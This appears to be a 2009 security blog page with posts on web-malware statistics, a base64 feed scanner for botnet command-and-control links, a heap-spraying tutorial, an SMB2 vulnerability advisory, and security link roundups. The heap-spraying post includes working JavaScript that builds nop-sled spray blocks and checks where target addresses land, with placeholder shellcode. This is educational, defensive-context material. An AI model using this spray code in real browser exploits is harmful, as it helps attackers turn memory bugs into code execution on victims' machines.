Every time we love, every time we give, it’s Christmas time!!
Friday, December 25, 2009
Saturday, November 7, 2009
Increase in Web Malware Activity
There have been many discussions on forums, blogs and message boards about how the web has now become the primary vehicle for malware to enter our networks. For a good treatment of the subject, refer to the webcast "Web Attacks: How Hackers Create and Spread Malware", presented by Chris McCormack (Web Security Expert, Sophos) and Fraser Howard (Principal Researcher, Sophos). The scary point made in that webcast is that there is no such thing as a trusted website. Even the most legitimate site can become the epicenter of a malware outbreak: from the popular social networking sites to private and public discussion boards, ordinary web sites and blogs, anything can become a harbouring ground for web malware. The table below, taken from the Kaspersky Security Bulletin (Statistics 2008), shows the number of malicious programs detected attacking users of some of the popular social networking sites, alongside each site's registered user base for the same year.
| Social Networking Site | Malware Detected (2008) | Registered Users (2008) |
|---|---|---|
| Odnoklassniki (www.odnoklassniki.ru) | 3,302 | 22,000,000 |
| Orkut (www.orkut.com) | 5,984 | 67,000,000 |
| Bebo (www.bebo.com) | 2,375 | 40,000,000 |
| LiveJournal (www.livejournal.com) | 846 | 18,000,000 |
| Friendster (www.friendster.com) | 2,835 | 90,000,000 |
| MySpace (www.myspace.com) | 7,487 | 253,000,000 |
| Facebook (www.facebook.com) | 3,620 | 140,000,000 |
| Cyworld (us.cyworld.com) | 301 | 20,000,000 |
| Skyblog (www.skyblog.com) | 28 | 2,200,000 |
Source: Kaspersky Security Bulletin (Statistics 2008)
Similarly, the graph below shows the sudden increase in web malware activity related to some of the popular social networking sites.
Source: Kaspersky Security Bulletin (Statistics 2008)
Recently it was discovered that social networking sites were being used for botnet command and control. Arbor Networks reported that they had identified a Twitter account being used as part of an update channel for infected systems belonging to a botnet. The account was issuing base64-encoded tweets that decoded to links from which the infected computers could fetch malware updates. Similar command and control mechanisms were also found on Tumblr and Jaiku. The bots polled the accounts' RSS feeds to pick up the status updates.
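A simple way to hunt for this pattern in a feed you are already collecting is to look for status updates that are nothing but a base64 blob which decodes to printable text containing URLs. The Node.js script below is an added example written for this post, not code from Arbor's write-up; the feed entries it scans are constructed, not real tweets, and the flattened `{ id, text }` shape of an RSS item is an assumption.

```javascript
// Added example for this post, not code from Arbor's write-up: scan feed entries
// for the pattern Arbor described, a status update that is a base64 string which
// decodes to one or more URLs. Sample entries below are constructed, not real tweets.

const URL_RE = /https?:\/\/[^\s"'<>]+/g;
const B64_RE = /^[A-Za-z0-9+/]+={0,2}$/;

// Return the decoded text if 'text' is a whole-message base64 blob that decodes to
// printable ASCII, otherwise null. The re-encode check rejects words that merely
// happen to use the base64 alphabet; the printable check drops binary garbage.
function decodeIfBase64(text) {
  const t = text.trim();
  if (t.length < 8 || t.length % 4 !== 0 || !B64_RE.test(t)) return null;
  const buf = Buffer.from(t, 'base64');
  if (buf.toString('base64') !== t) return null;
  const decoded = buf.toString('utf8');
  if (!/^[\x20-\x7e\r\n\t]+$/.test(decoded)) return null;
  return decoded;
}

// entries: [{ id, text }] as pulled from a status RSS feed (assumed shape).
// Returns the entries whose decoded body carries URLs, with the URLs extracted.
function extractHiddenLinks(entries) {
  const hits = [];
  for (const e of entries) {
    const decoded = decodeIfBase64(e.text);
    if (decoded === null) continue;
    const urls = decoded.match(URL_RE) || [];
    if (urls.length > 0) hits.push({ id: e.id, decoded, urls });
  }
  return hits;
}

// Constructed sample feed: one benign post, one encoded update pointer, two decoys.
const SAMPLE_ENTRIES = [
  { id: 'a1', text: 'Morning coffee and a long day of meetings ahead' },
  { id: 'a2', text: Buffer.from('http://example.com/u1 http://example.net/u2').toString('base64') },
  { id: 'a3', text: 'deadbeef' }, // valid base64 alphabet, but decodes to non-printable bytes
  { id: 'a4', text: 'Check this out http://example.org/news' }, // plain URL, not encoded
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const h of extractHiddenLinks(SAMPLE_ENTRIES)) {
    console.log(h.id, '->', h.urls.join(' '));
  }
}
```

Only entry `a2` is reported. Note that this catches the naked base64 variant described by Arbor; a bot author who switches to a URL-safe alphabet, XOR obfuscation or a custom encoding will slip past it, so treat it as a cheap first filter over feed collections rather than a detection rule.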
Google has pointed out that "1% of all search results contained at least one result that point to malicious content and the trend seems to be increasing". Of the billions of web pages they investigated, more than 3 million unique URLs on over 180,000 web sites automatically install malware by drive-by download. Shown below are some of the interesting statistics on web malware activity observed by the Google Security Team.
Source: Google Online Security Blog
The graph above shows the percentage of daily queries that contain at least one search result identified as malicious.
Source: Google Online Security Blog
The graph above shows the number of entries in the Google Safe Browsing malware list. It is obvious from these graphs that over the last few years there has been a constant increase in web-related malware. The Google research paper on this trend, as observed by the Google Security Team, is listed in the reference section of this article (Google Research).
The table below, taken from Kaspersky Monthly Malware Statistics, shows the top twenty web malware entries by number of infected web pages (new entries were highlighted in yellow in the original table).
| Position | Malware Name | Infected Web Pages |
|---|---|---|
| 1 | Trojan-Downloader.JS.Gumblar.a | 8538 |
| 2 | Trojan-Clicker.HTML.IFrame.kr | 7805 |
| 3 | Trojan-Downloader.HTML.IFrame.sz | 5213 |
| 4 | Trojan-Downloader.JS.LuckySploit.q | 4719 |
| 5 | Trojan-Downloader.HTML.FraudLoad.a | 4626 |
| 6 | Trojan-Downloader.JS.Major.c | 3778 |
| 7 | Trojan-GameThief.Win32.Magania.biht | 2911 |
| 8 | Trojan-Downloader.JS.ShellCode.i | 2652 |
| 9 | Trojan-Clicker.HTML.IFrame.mq | 2576 |
| 10 | Exploit.JS.DirektShow.o | 2476 |
| 11 | Trojan.JS.Agent.aat | 2402 |
| 12 | Exploit.JS.DirektShow.j | 2367 |
| 13 | Exploit.HTML.CodeBaseExec | 2266 |
| 14 | Exploit.JS.Pdfka.gu | 2194 |
| 15 | Trojan-Downloader.VBS.Psyme.ga | 2007 |
| 16 | Exploit.JS.DirektShow.a | 1988 |
| 17 | Trojan-Downloader.Win32.Agent.cdam | 1947 |
| 18 | Trojan-Downloader.JS.Agent.czm | 1815 |
| 19 | Trojan-Downloader.JS.Iframe.ayt | 1810 |
| 20 | Trojan-Downloader.JS.Iframe.bew | 1766 |
Source: Kaspersky Monthly Malware Statistics
Web malware has become a major contributor to this growing malware menace. According to ScanSafe's Annual Threat Report, an analysis of 200 billion web requests showed that web malware infections surged 582 percent last year, with a significant increase visible toward the last quarter of 2008. Security researchers at AVG Technologies have observed that the number of newly infected web sites has grown by 66 percent, from 100,000-200,000 per day to 200,000-300,000 per day, and the trend is expected to continue in the days to come.
Since 2006 the number of malware signatures carried by most antivirus vendors has doubled. But new variants, new infection methods and an increase in the number of distribution points (mainly compromised websites) have left antivirus vendors struggling to block these threats, resulting in missed detections. Earlier, antivirus companies blocked a major portion of this malware with dedicated and generic signatures; today it has become practically impossible to block it with the older methodologies alone. The statistics below (Jan-Jun 2009) show the detection misses of some of the major antivirus engines, a trend that has increased of late.
Source: CommTouch Labs
After calculating an average daily detection rate for some of the major antivirus vendors, Cyveillance, a cyber-intelligence gathering company, revealed that none of these products went over the 50% mark for successful detection. The top five scores came from McAfee (44 percent), Sophos (38 percent), Dr. Web (36 percent), Symantec (35 percent) and Trend Micro (34 percent). The list also included AVG (31 percent), F-Secure (28 percent), ESET (27 percent), Sunbelt (26 percent), F-Prot (23 percent), Norman (23 percent), Kaspersky (18 percent) and VirusBuster (16 percent). Similarly, Panda Security Research reported that, of 1.5 million home computers they examined, only 37.45 percent were correctly protected with an active anti-malware solution carrying the latest signature database, and of these protected computers 22.97 percent had active malware infections that the anti-malware solution had not detected. This is because more than 52 percent of malware is reconfigured within 24 hours of its first release so that it can evade signature-based scanners. They also audited the networks of 1,206 companies. These networks were protected by a variety of different security vendors and in 69.34 percent of the cases they were correctly protected; however, they still found that 71.79 percent of the systems on these networks were actively infected with malware.
Heap Spraying
Heap spraying is a technique, usually implemented in JavaScript in browser exploits, whose purpose is to make a memory corruption vulnerability reliably exploitable for arbitrary code execution. Although heap spray exploits have been in use since 2001, widespread use of the technique in exploits delivered by web malware has been seen since 2005. Let us now see what heap spraying actually is and how it is done.
A vulnerable application (in this case a browser like IE or Firefox) can, because of a memory corruption bug such as a dangling pointer or a corrupted object reference, end up jumping to or dereferencing an address it should never touch. If that address is not mapped, the access fails and the application crashes. When the application crashes Windows shows its crash dialog, as in the screenshot below:
Now, depending on the nature of the vulnerability, we can fill ("spray") the heap with as many copies of "nop sled + shellcode" as possible, until the address that the buggy code dereferences is no longer invalid but lies inside one of our sprayed blocks. Because the sled is a long run of harmless single-byte instructions, landing anywhere in it slides execution into the shellcode. In this way we arrange that our shellcode executes the next time the same illegal operation happens and the application references that (formerly invalid) address. Once this behaviour is controlled by a properly written exploit, the vulnerability yields arbitrary code execution. Please refer to the image below for a better understanding of the concepts mentioned above.
However, to successfully achieve arbitrary code execution using a heap spray there is one important thing to keep in mind. In the default 32-bit Windows memory layout, addresses above 0x7FFFFFFF belong to the KERNEL ADDRESS SPACE and addresses up to 0x7FFFFFFF belong to the USER ADDRESS SPACE (the boundary moves if the system is booted with /3GB). A process heap lives entirely in the USER ADDRESS SPACE, so the sprayed blocks can only ever occupy addresses below 0x7FFFFFFF. The address the vulnerable code dereferences must therefore also be a user-space address that the spray can reach; this is why exploits steer the bug toward values such as 0x0c0c0c0c or 0x0a0a0a0a, which are low enough to be covered by a spray of a few hundred megabytes. A user-mode dereference of a kernel-space address does not take the whole system down: it raises an access violation, and the application simply crashes without the shellcode ever running.
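The arithmetic behind the previous two paragraphs is easiest to see in code. The Node.js script below is an added example written for this post, not an exploit from the page or from any of the malware families listed above: it builds the sled + shellcode string the way IE-era exploits did, sizes each block so that string header plus data fills exactly 1 MiB, and then checks whether a chosen pointer value such as 0x0c0c0c0c would land in a sled, inside the shellcode, on a string header, or in unreachable (kernel) space. The block size, the 0x24-byte string header, the spray base address and the target address are all assumptions modelled on 32-bit IE6/IE7 heap behaviour, and the "shellcode" is 32 `int3` bytes, not a real payload.

```javascript
// Added example for this post: sizing heap-spray blocks and checking where a
// target address lands. Illustrative code, not an exploit from the page; the
// constants are assumptions modelled on 32-bit IE6/IE7-era heap behaviour.

const BLOCK_BYTES = 0x100000;        // spray in 1 MiB allocations (assumption)
const STRING_HEADER_BYTES = 0x24;    // approx. string object overhead in old IE (assumption)
const USER_SPACE_LIMIT = 0x7fffffff; // top of user space on default 32-bit Windows
const HEAP_BASE = 0x02000000;        // assumed start of the sprayed region (assumption)
const TARGET_ADDR = 0x0c0c0c0c;      // pointer value the bug is steered to (assumption)

// Constructed stand-in for shellcode: 32 x 'int3' (0xCC), NOT a real payload.
const SHELLCODE = new Uint8Array(32).fill(0xcc);

// Pack bytes two per UTF-16 code unit, little-endian, which is what
// unescape('%uXXXX') strings produced in IE exploits.
function bytesToJsString(bytes) {
  if (bytes.length % 2 !== 0) throw new Error('shellcode must have even length');
  let s = '';
  for (let i = 0; i < bytes.length; i += 2) {
    s += String.fromCharCode(bytes[i] | (bytes[i + 1] << 8));
  }
  return s;
}

// One spray block: a sled of 0x0c bytes followed by the shellcode, sized so that
// header + string data fills exactly BLOCK_BYTES. 0x0c0c0c0c is used for the sled
// because on x86 the bytes 0x0c 0x0c decode to 'or al, 0x0c', a harmless instruction,
// while the same value read as a pointer points back into the spray.
function buildSprayBlock(shellcode) {
  const payload = bytesToJsString(shellcode);
  const dataBytes = BLOCK_BYTES - STRING_HEADER_BYTES;
  const sledUnits = dataBytes / 2 - payload.length;
  if (sledUnits <= 0) throw new Error('shellcode too large for block');
  return '\u0c0c'.repeat(sledUnits) + payload; // '\u0c0c' === unescape('%u0c0c')
}

// Allocate 'count' copies. Old exploits used substring()/concat to force distinct
// heap allocations; modern engines may share storage, so this only mirrors the pattern.
function spray(count) {
  const block = buildSprayBlock(SHELLCODE);
  const blocks = [];
  for (let i = 0; i < count; i++) blocks.push(block.substring(0) + '');
  return blocks;
}

function isUserSpace(addr) {
  return addr >= 0 && addr <= USER_SPACE_LIMIT;
}

// Number of blocks that must be sprayed before the region reaches 'addr', assuming
// blocks are laid out contiguously upward from HEAP_BASE.
function blocksToCover(addr) {
  if (addr < HEAP_BASE) throw new Error('address below spray base');
  return Math.floor((addr - HEAP_BASE) / BLOCK_BYTES) + 1;
}

// Classify what the program would find at 'addr' once enough blocks are sprayed:
// 'header' (string object metadata, bad), 'sled' (good), 'shellcode' (mid-payload,
// bad) or 'unreachable' (kernel space or below the spray, cannot be covered).
function whereDoesItLand(addr, shellcodeBytes) {
  if (!isUserSpace(addr) || addr < HEAP_BASE) return 'unreachable';
  const offsetInBlock = (addr - HEAP_BASE) % BLOCK_BYTES;
  if (offsetInBlock < STRING_HEADER_BYTES) return 'header';
  if (offsetInBlock < BLOCK_BYTES - shellcodeBytes) return 'sled';
  return 'shellcode';
}

if (typeof require !== 'undefined' && require.main === module) {
  const blocks = spray(8); // small count for a stand-alone demo
  console.log('bytes per block:', blocks[0].length * 2 + STRING_HEADER_BYTES);
  console.log('blocks needed to reach 0x' + TARGET_ADDR.toString(16) + ':', blocksToCover(TARGET_ADDR));
  console.log('0x0c0c0c0c lands in:', whereDoesItLand(TARGET_ADDR, SHELLCODE.length));
  console.log('0x80000000 lands in:', whereDoesItLand(0x80000000, SHELLCODE.length));
}
```

With these constants 0x0c0c0c0c sits 0xc0c0c bytes into the 161st block, well inside the sled, which is why a spray of a couple of hundred 1 MiB blocks was the usual choice; 0x80000000 is classified as unreachable because no amount of spraying moves the heap across the user/kernel boundary. The odds of hitting a string header or the tail of the shellcode instead of the sled are exactly the header and shellcode fractions of the block, which is the reason real exploits keep the shellcode at the very end and the sled as long as possible.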
Thursday, October 8, 2009
New Sysinternals Tool - Disk2vhd
A new Sysinternals tool, Disk2vhd, was released yesterday by Mark Russinovich and Bryce Cogswell.
Disk2vhd is a utility that creates VHD (Virtual Hard Disk - Microsoft’s Virtual Machine disk format) versions of physical disks for use in Microsoft Virtual PC or Microsoft Hyper-V virtual machines (VMs). The difference between Disk2vhd and other physical-to-virtual tools is that you can run Disk2vhd on a system that’s online. Disk2vhd uses Windows’ Volume Snapshot capability, introduced in Windows XP, to create consistent point-in-time snapshots of the volumes you want to include in a conversion. You can even have Disk2vhd create the VHDs on local volumes, even ones being converted (though performance is better when the VHD is on a disk different than ones being converted).
You can download Disk2vhd from the Sysinternals website. Please refer to the link mentioned at the bottom of this post.
Some screenshots of Disk2vhd
Read more from the Sysinternals site (link provided below).
http://technet.microsoft.com/en-us/sysinternals/ee656415.aspx
Cheers Mark! Once again you have given us an amazing tool.
Wednesday, September 30, 2009
Tuesday, September 22, 2009
Microsoft Security Articles (Sep14-Sep20)
Article Topics & Links:
Microsoft Information Security Tools Team Website | RSS Feed
Anti-XSS Library v3.1 Released! - 17-Sep-2009
Introducing the Connected Information Security Framework and Risk Tracker - 16-Sep-2009
Want to Develop Software Security Tools? - 16-Sep-2009
Want to Shape Great Security Tools ? - 15-Sep-2009
CISF Security Portal Architecture - 15-Sep-2009
Automating Windows Firewall settings with C# (part 2) - 14-Sep-2009
Microsoft Malware Protection Center Website | RSS Feed
The modern rogue - a timely subject - 18-Sep-2009
I can’t go back to yesterday - see you in Geneva - 16-Sep-2009
September in Geneva - 15-Sep-2009
MSRC Ecosystem Strategy Website | RSS Feed
Announcing BlueHat v9: Through the Looking Glass - 14-Sep-2009
Security Bulletins Advisories Website | RSS Feed
Microsoft Security Advisory (975497): Vulnerabilities in SMB Could Allow Remote Code Execution - 9/17/2009 - 17-Sep-2009
Security Bulletins Comprehensive Website | RSS Feed
Microsoft Security Advisory (975497): Vulnerabilities in SMB Could Allow Remote Code Execution - 17-Sep-2009
MS09-047 - Critical: Vulnerabilities in Windows Media Format Could Allow Remote Code Execution (973812) - Version:1.1 - 16-Sep-2009
Security Vulnerability Research and Defense Website | RSS Feed
Update on the SMB vulnerability situation - 18-Sep-2009
OffVis updated, Office file format training video created - 14-Sep-2009
The Security Development Lifecycle Website | RSS Feed
Two New Security Tools for your SDL tool belt (Bonus: a “7-easy-steps” whitepaper) - 16-Sep-2009
Source: Microsoft Blogs
Monday, September 14, 2009
Microsoft Security Articles (Sep07-Sep13)
Security Articles:
Microsoft Information Security Tools Team Website | RSS Feed
How To: Identify Memory Leaks In An Unmanaged Application - 11-Sep-2009
How To: Adding Lots of Users To AD To Setup Testing Environments - 10-Sep-2009
Some Useful SQL Queries for Software Testers - 10-Sep-2009
How to: Restart a Remote Server Using Command Prompt - 09-Sep-2009
How To Publish an ASP.NET Website from a Command Line - 08-Sep-2009
Microsoft Malware Protection Center Website | RSS Feed
Delivering the latest MSRT update - 09-Sep-2009
Microsoft Security Response Center MSRC Website | RSS Feed
September 2009 Security Bulletin Webcast Video and Customer Q and A - 11-Sep-2009
Microsoft Security Advisory 975497 Released - 09-Sep-2009
September 2009 Security Bulletin Release - 08-Sep-2009
Security Bulletins Advisories Website | RSS Feed
Microsoft Security Advisory (975497): Vulnerabilities in SMB Could Allow Remote Code Execution - 9/8/2009 - 08-Sep-2009
Security Bulletins Comprehensive Website | RSS Feed
MS09-048 - Critical: Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (967723) - Version:2.1 - 10-Sep-2009
Microsoft Security Bulletin Summary for September 2009 - 09-Sep-2009
MS09-049 - Critical: Vulnerability in Wireless LAN AutoConfig Service Could Allow Remote Code Execution (970710) - Version:1.1 - 09-Sep-2009
MS09-045 - Critical: Vulnerability in JScript Scripting Engine Could Allow Remote Code Execution (971961) - Version:1.1 - 09-Sep-2009
MS09-035 - Moderate: Vulnerabilities in Visual Studio Active Template Library Could Allow Remote Code Execution (969706) - Version:2.3 - 08-Sep-2009
Microsoft Security Bulletin Summary for August 2009 - 08-Sep-2009
MS09-037 - Critical: Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution (973908) - Version:2.0 - 08-Sep-2009
MS09-047 - Critical: Vulnerabilities in Windows Media Format Could Allow Remote Code Execution (973812) - Version:1.0 - 08-Sep-2009
MS09-046 - Critical: Vulnerability in DHTML Editing Component ActiveX Control Could Allow Remote Code Execution (956844) - Version:1.0 - 08-Sep-2009
Security Vulnerability Research and Defense Website | RSS Feed
AutoPlay Windows 7 behavior backported - 12-Sep-2009
Assessing the risk of the September Critical security bulletins - 08-Sep-2009
MS09-048: TCP/IP vulnerabilities - 08-Sep-2009
Forefront Articles:
Forefront Product Suite Website | RSS Feed
CERN replaces Symantec with Forefront - 10-Sep-2009
Video: FPE vs FOPE and Exchange 2010 – Secure messaging with Forefront - 08-Sep-2009
Forefront Server Security Website | RSS Feed
Antigen 8.0 End-of-life and Engine Revision - 10-Sep-2009
Forefront Threat Management Gateway ISA Server Website | RSS Feed
Forefront TMG Network Inspection System Gets Its First 0-Day Signature Release - 10-Sep-2009
Behavioral Change on IE7 can affect Outbound access through ISA Server 2006 that is using Redirect on a Deny Rule - 09-Sep-2009
TMG Network Inspection System (NIS) – “Attention Required” Feature - 07-Sep-2009
Change Tracking in TMG - 07-Sep-2009
Web Publishing Test Button and KCD in TMG - 07-Sep-2009
Forefront Unified Application Gateway UAG Website | RSS Feed
Deep Dive Into DirectAccess – NAT64 and DNS64 In Action - 08-Sep-2009
Source: Microsoft Team Blogs
Wednesday, September 9, 2009
With great power comes great responsibility
Last time I blogged about "Vulnerabilities in SMB Could Allow Remote Code Execution" (Wednesday, September 9, 2009). Here are a few more details about this vulnerability.
Technical Details:
Windows Vista and newer versions of Windows ship with a new version of the SMB protocol, SMB2, implemented in the kernel-mode driver SRV2.SYS. SRV2.SYS fails to handle malformed SMB headers in the NEGOTIATE PROTOCOL REQUEST. The NEGOTIATE PROTOCOL REQUEST is the first SMB message a client sends to an SMB server, and it is used to agree on the SMB dialect that will be used for further communication. Because the fault occurs in a kernel driver, an attacker who can reach the SMB port can remotely crash (blue screen) any machine with SMB enabled, without any user interaction. Windows XP and Windows 2000 are NOT affected, as they do not have this driver.
Affected according to the discoverer's advisory: Windows Vista and Windows 7, 32-bit and 64-bit, SP1/SP2, fully updated; and probably Windows Server 2008, since it uses the same SMB 2.0 driver (not tested by him). Microsoft subsequently confirmed that the Windows 7 Release Candidate was affected but that the final (RTM) builds of Windows 7 and Windows Server 2008 R2 were not, which is why the Microsoft advisory reproduced below lists them as non-affected.
About the person who found this vulnerability:
As per Microsoft: "Microsoft is concerned that this new report of a vulnerability was not responsibly disclosed, potentially putting computer users at risk." However, the person who discovered the vulnerability has a very different view and recommendation. As per him: "vendor contacted, but no patch available for the moment. Close SMB feature and ports, until a patch is provided."
Discovering vulnerabilities requires deep knowledge, but releasing details of a vulnerability irresponsibly, and then releasing exploit code as proof of concept, is not a prudent action.
Vulnerabilities in SMB Could Allow Remote Code Execution
Published: September 08, 2009
Microsoft is investigating new public reports of a possible vulnerability in Microsoft Server Message Block (SMB) implementation. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time.
Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.
Microsoft is concerned that this new report of a vulnerability was not responsibly disclosed, potentially putting computer users at risk. We continue to encourage responsible disclosure of vulnerabilities. We believe the commonly accepted practice of reporting vulnerabilities directly to a vendor serves everyone's best interests. This practice helps to ensure that customers receive comprehensive, high-quality updates for security vulnerabilities without exposure to malicious attackers while the update is being developed.
Affected Software
- Windows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2
- Windows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2
- Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
- Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
- Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
Non-Affected Software
- Microsoft Windows 2000 Service Pack 4
- Windows XP Service Pack 2 and Windows XP Service Pack 3
- Windows XP Professional x64 Edition Service Pack 2
- Windows Server 2003 Service Pack 2
- Windows Server 2003 x64 Edition Service Pack 2
- Windows Server 2003 with SP2 for Itanium-based Systems
- Windows 7 for 32-bit Systems
- Windows 7 for x64-based Systems
- Windows Server 2008 R2 for x64-based Systems
- Windows Server 2008 R2 for Itanium-based Systems
Information Source:
Thursday, September 3, 2009
Symantec’s “Suspicious.Cloud” Detection
Symantec's antivirus products contain a highly sensitive detection technology designed to detect entirely new malware threats without traditional signatures. This technology is aimed at detecting malicious software that has been intentionally mutated or morphed by attackers.
If one or more files on your computer have been classified as having a Suspicious.Cloud threat, this indicates that the files have suspicious characteristics and therefore might contain a new or unknown threat. However, given the sensitive nature of this detection technology, it may occasionally identify non-malicious, legitimate software programs (FALSE POSITIVES) that also share these behavioral characteristics. Therefore, it is recommended that users manually check all files detected as Suspicious.Cloud by Symantec antivirus products for potential misidentification, and submit any suspect files to Symantec Security Response for further analysis (refer to the link below for virus submission to Symantec*).
In rare cases where a legitimate file has been misidentified and subsequently quarantined, your computer may behave abnormally or you may find that one or more applications no longer function as expected. In such rare situations, you should open the Quarantine in your Symantec antivirus product. From here, you may review the list of all files detected as Suspicious.Cloud and, if you identify a potential misidentification, restore the file from quarantine and allow it to run normally.
Original Source: